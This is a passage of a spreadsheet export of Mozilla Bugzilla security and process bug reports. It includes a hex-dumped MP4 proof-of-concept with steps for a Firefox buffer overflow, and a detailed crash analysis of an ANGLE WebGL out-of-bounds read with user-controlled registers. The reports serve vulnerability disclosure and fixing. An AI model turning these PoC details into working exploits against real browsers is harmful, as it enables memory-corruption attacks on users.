9f0: 00  f3  00  00  00  df  00  00  00  e1  00  00  00  cf  00  00                   
a00: 00  ce  00  00  00  d8  00  00  00  ce  00  00  00  c7  00  00                   
a10: 00  cd  00  00  00  b7  00  00  00  af  00  00  00  c8  00  00                   
a20: 00  d7  00  00  00  e5  00  00  00  e4  00  00  00  c6  00  00                   
a30: 00  d1  00  00  00  d5  00  00  00  e5  00  00  00  d8  00  00                   
a40: 00  c8  00  00  00  be  00  00  00  bf  00  00  00  cb  00  00                   
a50: 00  d2  00  00  00  c8  00  00  00  ca  00  00  00  b1  00  00                   
a60: 00  a3  00  00  00  c7  00  00  00  dc  00  00  00  d9  00  00                   
a70: 00  dd  00  00  00  d1  00  00  00  d2  00  00  00  c2  00  00                   
a80: 00  bc  00  00  00  b1  00  00  00  9b  00  00  00  89  00  00                   
a90: 00  a2  00  00  00  9f  00  00  00  b5  00  00  00  a6  00  00                   
aa0: 00  b2  00  00  00  b5  00  00  00  ae  00  00  00  b4  00  00                   
ab0: 00  b0  00  00  00  c6  00  00  00  c3  00  00  00  d5  00  00                   
ac0: 00  e4  00  00  00  f6  00  00  00  d6  00  00  00  db  00  00                   
ad0: 00  cc  00  00  00  e7  00  00  00  f9  00  00  00  cb  00  00                   
ae0: 00  d8  00  00  00  d6  00  00  00  e4  00  00  00  f1  00  00                   
af0: 00  e4  00  00  00  e6  00  00  00  df  00  00  00  ee  00  00                   
b00: 00  d7  00  00  00  c7  00  00  00  e7  00  00  00  f9  00  00                   
b10: 00  ed  00  00  00  cf  00  00  00  f1  00  00  00  e6  00  00                   
b20: 00  dc  00  00  00  e4  00  00  00  ef  00  00  00  e5  00  00                   
b30: 00  f1  00  00  00  e3  00  00  00  ec  00  00  00  ec  00  00                   
b40: 00  f3  00  00  00  f5  00  00  00  fd  00  00  01  0b  00  00                   
b50: 01  10  00  00  01  11  00  00  01  03  00  00  01  01  00  00                   
b60: 00  fb  00  00  00  fa  00  00  00  e7  00  00  00  e5  00  00                   
b70: 00  f0  00  00  00  d2  00  00  00  e5  00  00  00  f3  00  00                   
b80: 00  f1  00  00  00  f2  00  00  00  ff  00  00  00  f7  00  00                   
b90: 00  ee  00  00  00  d5  00  00  00  d9  00  00  00  ea  00  00                   
ba0: 00  e3  00  00  00  df  00  00  00  f7  00  00  00  ff  00  00                   
bb0: 00  f8  00  00  00  fa  00  00  00  fd  00  00  00  f7  00  00                   
bc0: 00  f9  00  00  00  fb  00  00  00  f8  00  00  00  f6  00  00                   
bd0: 00  f0  00  00  00  fe  00  00  01  02  00  00  00  e9  00  00                   
be0: 00  ec  00  00  00  ec  00  00  00  e7  00  00  00  ea  00  00                   
bf0: 00  de  00  00  00  e2  00  00  00  c9  00  00  00  d4  00  00                   
c00: 00  d4  00  00  00  c7  00  00  00  c9  00  00  00  c8  00  00                   
c10: 00  c1  00  00  00  c0  00  00  00  bd  00  00  00  de  00  00                   
c20: 00  cb  00  00  00  cd  00  00  00  d4  00  00  00  6d  00  00                m  
c30: 00  28  73  74  73  63  00  00  00  00  00  00  00  02  00  00    (stsc          
c40: 00  01  00  00  00  07  00  00  00  01  00  00  00  26  00  00                &amp;  
c50: 00  02  00  00  00  01  00  00  00  a8  73  74  63  6f  00  00             stco  
c60: 00  00  00  00  00  26  00  00  6d  8d  00  00  85  9b  00  00        &amp;  m       
c70: 9d  e4  00  00  b1  21  00  00  c2  a7  00  00  d2  8e  00  00        !          
c80: df  8e  00  00  f3  54  00  00  fe  e8  00  01  1a  05  00  01        T          
c90: 4a  c7  00  01  7e  28  00  01  c5  a1  00  01  fc  89  00  02   J   ~(          
ca0: 35  5c  00  02  83  6a  00  02  ae  62  00  02  e1  ae  00  03   5\   j   b      
cb0: 1d  6d  00  03  58  04  00  03  99  4d  00  03  e4  b1  00  04    m  X    M      
cc0: 21  99  00  04  39  67  00  04  5d  c6  00  04  78  18  00  04   !   9g  ]   x   
cd0: 92  6a  00  04  a7  67  00  04  b8  7e  00  04  d0  6c  00  04    j   g   ~   l  
ce0: e7  0c  00  05  07  c6  00  05  53  5c  00  05  74  bc  00  05           S\  t   
cf0: 8e  99  00  05  ae  19  00  05  c0  eb  00  05  cb  47  00  00                G  
d00: 00  16  75  64  74  61  00  00  00  0e  6e  61  6d  65  53  74     udta    nameSt
d10: 65  72  65  6f  00  00  00  6f  75  64  74  61  00  00  00  67   ereo   oudta   g
d20: 6d  65  74  61  00  00  00  00  00  00  00  21  68  64  6c  72   meta       !hdlr
d30: 00  00  00  00  00  00  00  00  6d  64  69  72  00  00  00  00           mdir    
d40: 00  00  00  00  00  00  00  00  00  00  00  00  3a  69  6c  73               :ils
d50: 74  00  00  00  32  a9  74  6f  6f  00  00  00  2a  64  61  74   t   2 too   *dat
d60: 61  00  00  00  01  00  00  00  00  62  6c  61  68  62  6c  61   a        blahbla
d70: 68  62  20  30  2e  39  2e  34  20  32  32  32  32  31  31  32   hb 0.9.4 2222112
d80: 33  30  30  00  00  00  08  66  72  65  65  
Then create poc_body.bin with these contents:
000: 01  00  00  00  70  73  73  68  00  00  00  04  ee  ee  ee  ee       pssh
010: ee  ee  ee  ee  ee  ee  ee  ee  ee  ee  ee  ee  00  00  00  00
020: 50  75  74  20  79  6f  75  72  20  61  74  74  61  63  6b  20   Put your attack
030: 63  6f  64  65  20  61  6e  64  20  64  61  74  61  20  68  65   code and data he
040: 72  65  2e  2e  2e  2e  2e  2e  2e  2e  2e  2e  2e  2e  2e  2e   re..............
050: 2d  2d  2d  2d  2d  2d  2d  2d  2d  2d  2d  2d  2d  2d  2d  2d   ----------------
Set the length of poc_body.bin to 0x01000000. It doesn't matter what bytes 0x20-0xffffff contain.
Next, repeatedly double poc_body.bin until it's exactly 0x100000000 bytes long (4GB).
Then copy poc_header.bin+poc_body.bin+poc_trailer.bin into poc_test.mp4 , Start FF Win64 and attach a debugger, setting a BP on line 511. Load poc_test.mp4 and wait for the BP to fire, then step the code to see the overflow and subsequent overrun.</t>
        </is>
      </c>
      <c r="X6261" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6262">
      <c r="A6262" t="n">
        <v>1341574</v>
      </c>
      <c r="B6262" t="inlineStr">
        <is>
          <t>2017-02-22 02:41:42 -0800</t>
        </is>
      </c>
      <c r="C6262" t="inlineStr">
        <is>
          <t>Improve bug handling: cc, whiteboard, triage and follow up, needs owners, &amp; possibly additional components</t>
        </is>
      </c>
      <c r="D6262" t="inlineStr">
        <is>
          <t>2017-06-01 07:18:04 -0700</t>
        </is>
      </c>
      <c r="E6262" t="n">
        <v>1</v>
      </c>
      <c r="F6262" t="n">
        <v>1</v>
      </c>
      <c r="G6262" t="n">
        <v>5</v>
      </c>
      <c r="H6262" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6262" t="inlineStr">
        <is>
          <t>support.mozilla.org - Lithium</t>
        </is>
      </c>
      <c r="J6262" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6262" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6262" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6262" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6262" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6262" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6262" t="inlineStr"/>
      <c r="Q6262" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6262" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6262" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6262" t="n">
        <v>1</v>
      </c>
      <c r="U6262" t="n">
        <v>0</v>
      </c>
      <c r="V6262" t="n">
        <v>14</v>
      </c>
      <c r="W6262" t="inlineStr">
        <is>
          <t>When Sumo Lithium bugs are entered they apparently have no owner|qa contact, maybe it helps if we have an improved template available.  Which Sumo Admins are responsible for the lithium buglist generally. Little point in saying everyone or we get in to the situation 
":-) Anybody could, but nobody did because ..." 
and quite possibly some of the reviewing  could easily be delegated to contributors.
CC
There are no CC entries made at all.  So I have taken the liberty of adding what would appear likely to be appropriate staff to this bug's cc list.
It should be set up to CC someone presumably including Sumo staff.
WHITEBOARD &amp; TRIAGE
We are using a whiteboard entries on some bugs. Sumo bugs were previously controlled and tracked on third party software I believe is that going to be reintroduced? or are we sticking with bugzilla's features - that appears to be the current methodology.
If we are using a whiteboard we should have a good and easily accessible listing of when they are to be used, and whether anyone can enter  these or is it only a triager or Admin. Presumably most or all bugs should have at least one Whiteboard entry.
Who if anyone id Triaging and reviewing bugs
We do have some comments about the whitelist in the "Agenda" currently
&gt; https://docs.google.com/document/d/1iz1xp2Iie4dvdy5WKC6aL8Nyx1tbLZE_6WQop4htTw8/edit#
&gt;[26th Jan]  ... the ones that will be fixed in the first two weeks after launch (1st2weeks) and the one who will be fixed later (phase2). Just search via the bugzilla field “Details-&gt;Whiteboard” for [phase2] and [1st2weeks].
We probably could do with considering additional whiteboard words. The first two weeks has passed, so everything else is going to be [phase2] that makes it rather redundant, and what about priorities, as clearly some will be more important than others. Do we for instance use merely the bugzilla priority &amp; severity fields or maybe supplement that with whiteboard words and meta bugs. 
COMPONENTS
We probably need to clear or archive old sumo bugs and components or they will end up being reused for new bugs. We probably need to add other Lithium Related components. How long is a Lithium migration period lasting? before bugs become: Lithium KB issues, Lithium Search issues, or whatever.
And of course where does Lithium come in to this process with their staff and contacts and any bugtracking they may have upstream of our own.
I could have started this as a forum discussion but there are clear directives that we are now tracking Lithium Migration issues using Bugzilla bugs.</t>
        </is>
      </c>
      <c r="X6262" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6263">
      <c r="A6263" t="n">
        <v>1692832</v>
      </c>
      <c r="B6263" t="inlineStr">
        <is>
          <t>2021-02-15 01:20:00 -0800</t>
        </is>
      </c>
      <c r="C6263" t="inlineStr">
        <is>
          <t>OOBR in Angle LoadRGB8ToBGR565</t>
        </is>
      </c>
      <c r="D6263" t="inlineStr">
        <is>
          <t>2024-05-30 10:27:40 -0700</t>
        </is>
      </c>
      <c r="E6263" t="n">
        <v>1</v>
      </c>
      <c r="F6263" t="n">
        <v>1</v>
      </c>
      <c r="G6263" t="n">
        <v>3</v>
      </c>
      <c r="H6263" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6263" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6263" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K6263" t="inlineStr">
        <is>
          <t>Firefox 87</t>
        </is>
      </c>
      <c r="L6263" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6263" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6263" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6263" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6263" t="inlineStr">
        <is>
          <t>[adv-main87+][adv-esr78.9+][sec-survey]</t>
        </is>
      </c>
      <c r="Q6263" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6263" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S6263" t="inlineStr">
        <is>
          <t>88 Branch</t>
        </is>
      </c>
      <c r="T6263" t="n">
        <v>0</v>
      </c>
      <c r="U6263" t="n">
        <v>0</v>
      </c>
      <c r="V6263" t="n">
        <v>15</v>
      </c>
      <c r="W6263" t="inlineStr">
        <is>
          <t>Created attachment 9203188
texImage2d-PoC.html
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Steps to reproduce:
# Crash Report
## Crash Environment: 
**Application Name: firefox.exe (Nightly) **
**Application Version: 87.0a1 (2021-02-13) (64-bit)**
## Crash Analysis: 
Crash occurs at **libGLESv2!angle::LoadRGB8ToBGR565+0x57** at the following instruction: 
&gt; movzx r10d,byte ptr [rsi-2] ds:000004c1`6b396939=?? 
Equivalent source code for the instruction is: 
&gt; dest[x] = (r5 &lt;&lt; 11) | (g6 &lt;&lt; 5) | b5; 
From the above instruction ***x*** is a user-controlled variable and ***r5***, ***g6*** and ***b5*** are calculated using ***source*** variable. ***Source*** and ***dest*** pointers are calculated in **libGLESv2!angle::LoadRGB8ToBGR565** as follows:
&gt; const uint8_t *source = priv::OffsetDataPointer&lt;uint8_t&gt;(input, y, z, inputRowPitch, inputDepthPitch); 
&gt; uint16_t *dest = priv::OffsetDataPointer&lt;uint16_t&gt;(output, y, z, outputRowPitch, outputDepthPitch);
In the above source code, ***source*** and ***dest*** are calculated using user-controlled input ***y***, ***inputRowPitch*** and ***inputDepthPitch***. From the PoC we know that the crash occurs when a pixel unpack buffer is created and then texImage2D is called. The syntax for texImage2d used in PoC is:
&gt; void gl.texImage2D(target, level, internalformat, width, height, border, format, type, ImageData source);
The variables being affected by user input are, 
***x*** is used in for loop and as an index for ***dest*** while writing pixel data, the exit condition is ***x &lt; width***. 
***y*** is used in for loop in which ***source*** and ***dest*** are calculated, the exit condition is ***y &lt; height***. 
***inputRowPitch*** and ***inputDepthPitch*** are calculated using ***width*** and ***height*** from texImage2D.
The source for the crash seems to be in **libGLESv2!rx::`anonymous namespace'::GetUnpackPointer** which returns the ***pixelData*** pointer, which is passed as ***input*** pointer being used in calculation of ***source*** pointer 
&gt; if (unpackBuffer) { 
&gt; ptrdiff_t offset = reinterpret_cast&lt;ptrdiff_t&gt;(pixels); 
&gt; BufferD3D *bufferD3D = GetImplAs&lt;BufferD3D&gt;(unpackBuffer); 
&gt; ASSERT(bufferD3D); 
&gt; const uint8_t *bufferData = nullptr; 
&gt; ANGLE_TRY(bufferD3D-&gt;getData(context, &amp;bufferData)); 
&gt; *pointerOut = bufferData + offset; 
}
The above code snippet is from the function **libGLESv2!rx::`anonymous namespace'::GetUnpackPointer**. The return pointer ***pointerOut*** is calculated by adding ***bufferData*** and ***offset*** which seem to be pointers, the resulting pointer is out of bounds. Thus, the program crashes when it tries to read data being pointed using returned pointer by this function.
## Register values at crash: 
```
2:042&gt; r 
&gt; rax=0000000000000000 rbx=00000260b0cbe000 rcx=0000000000000040 rdx=0000000000000040 
&gt; rsi=000004c16b39693b rdi=00000000000000c0 rip=00007ffbcd4491d7 rsp=0000008b2f0ddd18 
&gt; rbp=0000000000000000 r8=00000260b0cbe000 r9=000004c16b39693b r10=00000fff79a89230 
&gt; r11=0001000004000040 r12=0000000000000080 r13=00000000000000c0 r14=00007ffbcd449180 r15=0000000000000000 
&gt; iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 
&gt; **libGLESv2!angle::LoadRGB8ToBGR565+0x57: 00007ffb`cd4491d7 440fb656fe movzx r10d,byte ptr [rsi-2] ds:000004c1`6b396939=??**
```
Registers ***rxc***, ***rdx***, ***rdi***, ***r11*** and ***r13*** are user controllable at crash, the register values can be mapped to the following function in PoC:
&gt; gl4.texImage2D(gl4.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl4.RGB565, 64, 64, 0, gl4.RGB, gl4.UNSIGNED_BYTE, imgData);
***Width*** and ***height*** are 64 (0x40) which is seen in registers ***rcx***, ***rdx*** and ***r11***. ***inputRowPitch*** is 0xc0 and is calculated using ***width***, it is present in ***rdi*** and ***r13*** registers.
## Call Stack:
```
 Child-SP RetAddr Call Site 
00 00000072`d163dd98 00007ffb`cd15ef86 libGLESv2!angle::LoadRGB8ToBGR565+0x57 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/image_util/loadimage.cpp @ 396] 
01 00000072`d163ddf0 00007ffb`cd1324d0 libGLESv2!rx::Image11::loadData+0x1f6 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/renderer/d3d/d3d11/Image11.cpp @ 305] 
02 00000072`d163deb0 00007ffb`cd13759a libGLESv2!rx::TextureD3D::setImageImpl+0x1d0 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/renderer/d3d/TextureD3D.cpp @ 278] 
03 00000072`d163df60 00007ffb`cd0bad52 libGLESv2!rx::TextureD3D_Cube::setImage+0x9a [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/renderer/d3d/TextureD3D.cpp @ 1758] 
04 00000072`d163dfd0 00007ffb`cd045122 libGLESv2!gl::Texture::setImage+0xe2 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/Texture.cpp @ 1143] 
05 00000072`d163e0a0 00007ffb`cd23df5b libGLESv2!gl::Context::texImage2D+0x182 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/Context.cpp @ 4461] 
06 00000072`d163e160 00007ffb`c64140de libGLESv2!gl::TexImage2D+0x13b [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libGLESv2/entry_points_gles_2_0_autogen.cpp @ 2836] 
07 00000072`d163e210 00007ffb`c640b432 xul!mozilla::gl::GLContext::raw_fTexImage2D+0x7e [/builds/worker/workspace/obj-build/dist/include/GLContext.h @ 1660] 
08 00000072`d163e280 00007ffb`c709b4f0 xul!mozilla::gl::GLContext::fTexImage2D+0x72 [/builds/worker/checkouts/gecko/gfx/gl/GLContext.cpp @ 2276] 
09 00000072`d163e310 00007ffb`c704e6a6 xul!mozilla::DoTexImage+0xb0 [/builds/worker/checkouts/gecko/dom/canvas/WebGLTextureUpload.cpp @ 618] 
0a 00000072`d163e3d0 00007ffb`c704de7a xul!mozilla::webgl::DoTexOrSubImage+0xc6 [/builds/worker/checkouts/gecko/dom/canvas/TexUnpackBlob.cpp @ 482] 
0b 00000072`d163e470 00007ffb`c709ce2e xul!mozilla::webgl::TexUnpackBytes::TexOrSubImage+0x1aa [/builds/worker/checkouts/gecko/dom/canvas/TexUnpackBlob.cpp @ 583] 
0c 00000072`d163e550 00007ffb`c7079765 xul!mozilla::WebGLTexture::TexImage+0x9ce [/builds/worker/checkouts/gecko/dom/canvas/WebGLTextureUpload.cpp @ 1074] 
0d 00000072`d163e9a0 00007ffb`c708c104 xul!mozilla::WebGLContext::TexImage+0xa5 [/builds/worker/checkouts/gecko/dom/canvas/WebGLContextTextures.cpp @ 202] 
0e (Inline Function) --------`-------- xul!mozilla::HostWebGLContext::TexImage+0x2c [/builds/worker/checkouts/gecko/dom/canvas/HostWebGLContext.h @ 557] 
0f (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,75,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, const mozilla::avec3&lt;unsigned int&gt; &amp;, const mozilla::webgl::PackingInfo &amp;, const mozilla::webgl::TexUnpackBlobDesc &amp;) const,&amp;mozilla::HostWebGLContext::TexImage&gt;::DispatchCommand&lt;mozilla::HostWebGLContext&gt;::&lt;unnamed-tag&gt;::operator()+0x132a [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 231] 
10 (Inline Function) --------`-------- xul!std::_C__Invoker_functor::_Call+0x132a 
11 (Inline Function) --------`-------- xul!std::_C_invoke+0x132a
12 (Inline Function) --------`-------- xul!std::_Apply_impl+0x132a [/builds/worker/checkouts/gecko/vs2017_15.8.4/VC/include/tuple @ 1233] 
13 (Inline Function) --------`-------- xul!std::apply+0x132a [/builds/worker/checkouts/gecko/vs2017_15.8.4/VC/include/tuple @ 1241] 
14 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,75,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, const mozilla::avec3&lt;unsigned int&gt; &amp;, const mozilla::webgl::PackingInfo &amp;, const mozilla::webgl::TexUnpackBlobDesc &amp;) const,&amp;mozilla::HostWebGLContext::TexImage&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 228] 
15 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,74,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, unsigned int, const mozilla::avec3&lt;unsigned int&gt; &amp;) const,&amp;mozilla::HostWebGLContext::TexStorage&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
16 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,73,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, unsigned int, const mozilla::avec3&lt;unsigned int&gt; &amp;, const mozilla::avec2&lt;int&gt; &amp;, const mozilla::avec2&lt;unsigned int&gt; &amp;) const,&amp;mozilla::HostWebGLContext::CopyTexImage&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
17 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,72,void (mozilla::HostWebGLContext::*)(unsigned int) const,&amp;mozilla::HostWebGLContext::GenerateMipmap&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
18 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,71,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned long long) const,&amp;mozilla::HostWebGLContext::BindTexture&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
19 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,70,void (mozilla::HostWebGLContext::*)(unsigned int) const,&amp;mozilla::HostWebGLContext::ActiveTexture&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
1a (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,69,void (mozilla::HostWebGLContext::*)(unsigned long long, unsigned int, unsigned int, unsigned int, unsigned int) const,&amp;mozilla::HostWebGLContext::RenderbufferStorageMultisample&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
1b (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,68,void (mozilla::HostWebGLContext::*)(unsigned int) const,&amp;mozilla::HostWebGLContext::ReadBuffer&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
1c (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,67,void (mozilla::HostWebGLContext::*)(unsigned int, const mozilla::RawBuffer&lt;const unsigned int&gt; &amp;, int, int, int, int) const,&amp;mozilla::HostWebGLContext::InvalidateSubFramebuffer&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
1d (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,66,void (mozilla::HostWebGLContext::*)(unsigned int, const mozilla::RawBuffer&lt;const unsigned int&gt; &amp;) const,&amp;mozilla::HostWebGLContext::InvalidateFramebuffer&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
1e (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,65,void (mozilla::HostWebGLContext::*)(int, int, int, int, int, int, int, int, unsigned int, unsigned int) const,&amp;mozilla::HostWebGLContext::BlitFramebuffer&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
1f (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,64,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned long long, const mozilla::RawBuffer&lt;unsigned char&gt; &amp;) const,&amp;mozilla::HostWebGLContext::BufferSubData&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
20 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,63,void (mozilla::HostWebGLContext::*)(unsigned int, const mozilla::RawBuffer&lt;unsigned char&gt; &amp;, unsigned int) const,&amp;mozilla::HostWebGLContext::BufferData&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
21 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,62,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, unsigned long long, unsigned long long, unsigned long long) const,&amp;mozilla::HostWebGLContext::CopyBufferSubData&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
22 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,61,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, unsigned long long, unsigned long long, unsigned long long) const,&amp;mozilla::HostWebGLContext::BindBufferRange&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
23 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,60,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned long long)
const,&amp;mozilla::HostWebGLContext::BindBuffer&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
24 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,59,void (mozilla::HostWebGLContext::*)(int, int, int, int) const,&amp;mozilla::HostWebGLContext::Viewport&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
25 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,58,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, unsigned int, unsigned int) const,&amp;mozilla::HostWebGLContext::StencilOpSeparate&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
26 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,57,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int) const,&amp;mozilla::HostWebGLContext::StencilMaskSeparate&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
27 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,56,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, int, unsigned int) const,&amp;mozilla::HostWebGLContext::StencilFuncSeparate&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
28 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,55,void (mozilla::HostWebGLContext::*)(unsigned long long, const std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &amp;) const,&amp;mozilla::HostWebGLContext::ShaderSource&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
29 (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,54,void (mozilla::HostWebGLContext::*)(int, int, int, int) const,&amp;mozilla::HostWebGLContext::Scissor&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
2a (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,53,void (mozilla::HostWebGLContext::*)(float, bool) const,&amp;mozilla::HostWebGLContext::SampleCoverage&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
2b (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,52,void (mozilla::HostWebGLContext::*)(unsigned long long, mozilla::layers::TextureType, bool) const,&amp;mozilla::HostWebGLContext::Present&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
2c (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,51,void (mozilla::HostWebGLContext::*)(float, float) const,&amp;mozilla::HostWebGLContext::PolygonOffset&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
2d (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,50,void (mozilla::HostWebGLContext::*)(unsigned long long) const,&amp;mozilla::HostWebGLContext::LinkProgram&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
2e (Inline Function) --------`-------- xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,49,void (mozilla::HostWebGLContext::*)(float) const,&amp;mozilla::HostWebGLContext::LineWidth&gt;::DispatchCommand+0x2e33 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
